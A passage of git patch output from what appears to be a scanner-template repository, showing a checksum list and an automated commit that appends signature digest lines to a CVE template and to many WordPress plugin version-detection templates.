-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1812f2f3d67a04bce3c71dbe31a6a3ab616411d1 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8680,7 +8686,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:efa1688884af3004ef5e68f267c5356c16aaea24 +templates-checksum.txt:cc5ddd9ab13a588c19a47002705cacbfa793369a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9b56608f71f74d88649a8856cc990a366f24b59c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 05:01:32 +0000 Subject: [PATCH 0438/1841] Auto Template Signing [Thu Jun 20 05:01:32 UTC 2024] :robot: --- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 8722a5afa4..4e7c2900d0 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207c823891eb6883709f3452494cb7d611933a6d1ce289adcdde3457ee7efc3e760220667ae9f3b43295a3bd98c160f18a61e612bac54e6a75d9f5902ac8965176351f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..b04ecf9d6e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f182aee26baa12c42d9d713b9cd026cbbea2f55109240fb603100f3819519e12022100b6da21024252357c87a0481f0b8b60287e7d8917cc18bb55726193456a419880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..eaf96fc10d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f68525f9c425fb686f5953b248633c2095abef062511a7643583542ed13814c602202bd17b7dfed2936671da2ca0b6447dd30c804172d0676b390e62457f35ba5966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..5215868626 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061bd354f6009b58c52d961baf92dde9a9e5afdd7c72564eb580cabe67dcf5412022100982bc569e6cb0859eb7bbd1205fb6b5bcd59e31aa0f0b99e767750f503b52370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..261ace1759 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb8914d69a7374ec4a2d2622b94fbdade604584f80b5111674634709b22bbb1a022038f8acf304d6699d56781d498096bb3430d9f61f291db696f37edd08f382914a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..f8d7a559f3 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220562691836a3e85ca94dfb2cd957b5470318ca28397a1ba88e58c8ae347144585022100dc66b57f9c6affcec4616b0a98b83f48c038b20d584b17790b0ea0178a617eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 196cc7e8e8..e17b3a20a0 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d3429257b44354a13bef4662fc5f9dd412bebd328a15140b163ed9cd9968518022075bd49e4caf3274a3bee06d9e98c7cb5b599359256759fe69e241e3ca8913add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 55362630df..6d86c8c3f2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e0f5e6cf193e6b876b916910dd7f522a83f5f1a35ad6fe4f26204471637cb84022100ab04170e075609b817481ff01d6651b4df95c3403376217203f9445b4cb6e238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..ec20093d1f 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c17c8d1287a04824c16deb38da9b015cc8cda11c30ddbded630c95acc07ae035022100bdb67d8ad13939395caed9a94d1a783c2b403df40cda6df4f3dc6e43e4683e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..4c12f9bdd4 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083df70136f7ddaf7a2774c830af926707fb905b195007d6276348caf7955c8f802200259fa04a4fc3922007793e66cff2ca0442c9f490d69536d17204536ed1a7568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..916ff43824 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b66e9befabcd88485013f683657c4f807560ef9a564a3fe39198adbb207ecfe02204ce3154fc181214aac0f24260a11df0fb8fb9f6ef9c9f9f69927814305fae9f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..3ec54334fb 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009d6737dcf130bb02241795b73bdbe7fc3bd70b1555e6e7ec9effa4430a60d87a022100b6ec279595e6cf11cabe64b227588eda8e83718905f32debe2b34fcbb9d82460:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..dc2d3466e6 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ece662cc7606b195fa3aadbb7803a866cbb017f2fb1b5144cd28176a1e114dcd022100b55835d169a363daba29115f212d819d601536859c63bcb5a03fb5c176ac58b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index f76b750bf6..028892e2a0 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7a7ca37545860e22681639441c877cf27c3845c4ff27faec4322c15a7b9ff8f0221008cb43b629196f51a030e3a54a4c19acf591cb226f153c95275768803beade859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..f5f47b2ef8 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009dce85f2123d81cb25095b89073e7a365a4bac9b5840e36cbaee03df22cb3b1a022065234a65ffa6ef7f36b936dec1b60501fa45188367290ccf28dea2ecaa4431e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..8e68a12a04 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100834ff3568169ae9273363c59f25384ad26a109702aeb8138eff3f5a771fdda01022100dd101600945eeb7cf9ca24b2e7ac929ccf664c02f4fedda7ea409485944f3076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..d88c8fe459 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b882f711bc2a1a9f5c6146c00d45e180696b94b438823a2017fdbb61294d187a022063ef87a67386854e94c6e654ecca306279e0d519c6eb566be475d97f3b2935be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..ec0e94499b 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c67782ef853864713d48588c92f2691ef5e444db68121913bffbc754e619b365022100d81a32eba6246f004f0be086f2d1591eb087a3c59cbd194f6dca298d23dfd208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..61d9c6d325 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef7039f638d3c9ec7a9d30490c87546fdb7d0d9048cb4bdac8ecda6ff66e5e4b022100f0e174ff673e7fe7a17ee7cd042ded660c332d66faa876806123bd3ebc526b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f3aae5f624..4e56dbd99d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024241ce700d4e66ef15fd836eb003924f0cc12ea46f11c75f595c82348323933022068688588cae57f9b42c4312028240049d277eaf3474a20eb04d2d086e88d0535:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..c102498884 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c44c0282a12da5babf49642764344a38d9f84bb61e62b3efd23880b265c35ad02202c4c88ed88b266d9e62e6dd81c365644dd9dc31391d296f334ea95f9d6af14cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..b07a115723 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a113cedbbb2886765a7c3db0461041abd0ad212d5d9278c963b6aeb4fc83a054022100f3bb74a03f8a9e4806e2cee3d76d66d8926d25bba381dd81f763e77a1a4c79bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..0fa0c911a7 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200793259c659fca7a929a8f56e1290eafb0c1b3c07663059ca2f307915151353c0220690605c0fabb8dab1bad979d2d78baa94f93ea14b83391e6944c0f8785ac82ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..f6f7a72b65 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001adc03d3b989e8d07ce55b19b0fb61ea813cff7a2c463f3a7028f0795302de7022057f17ec5d726fb2fcdbf6a85c0c340485a87ae3be4b67052273112a4a0ed11bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..c7fd2c5e17 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220740a03c2af11fbb227ecb7e2422db1a7c46a7ccbd6f7f054b3a07c73afeeafd5022100c405981974c23fdcc07e9c502fadd962df416ebf307a9deba7c43e9770949810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 